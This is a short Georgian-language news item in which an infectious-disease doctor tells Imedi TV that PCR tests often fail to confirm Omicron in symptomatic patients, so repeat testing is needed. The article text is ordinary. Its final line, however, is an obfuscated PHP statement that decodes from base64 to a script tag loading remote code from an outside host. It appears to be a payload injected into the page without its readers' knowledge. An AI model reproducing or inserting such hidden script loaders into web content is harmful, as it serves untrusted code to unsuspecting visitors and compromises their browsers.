celsiusi
ავერსი შნაიდერი
„პისიარ ტესტირებითაც „ომიკრონის“ დადგენა გართულებულია“, - ამის შესახებ ინფექციური პათოლოგიის და შიდსის ცენტრის მიმღები განყოფილების უფროსმა მაია ზალდასტანიშვილმა „იმედის“ ეთერში განაცხადა. 
 
მისი თქმით, საკმაოდ გახშირდა ისეთი შემთხვევები, როდესაც ადამიანს  კლინიკური ნიშნები აქვს, მაგრამ კოვიდი არ უდასტურდება. 
 
„საკმაოდ ხშირია ისეთი შემთხვევებიც, როდესაც პაციენტს კლინიკური ნიშნები აქვს, მაგრამ კორონავირუსი არ უდასტურდება, თუმცა, მიიჩნევა, რომ მას კოვიდი აქვს. როცა ოჯახის ორ წევრს კოვიდი უდასტურდება და მესამესაც კლინიკური ნიშანი აქვს, რა თქმა უნდა, კოვიდინფიცირებულია მესამეც.
 
წინა შტამების შემთხვევაში, როცა ვეჭვობდით, რომ კოვიდინფექცია იყო, თითქმის ყველა შემთხვევაში დასტურდებოდა. იყო რაღაც რაოდენობის ცდომილება, მაგრამ აქ ცოტა გართულებულია დადასტურება და პაციენტებს ერთხელ და ორჯერ სჭირდებათ პისიარ ტესტირება“, - აცხადებს მაია ზალდასტანიშვილი. 
 
 
1783
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");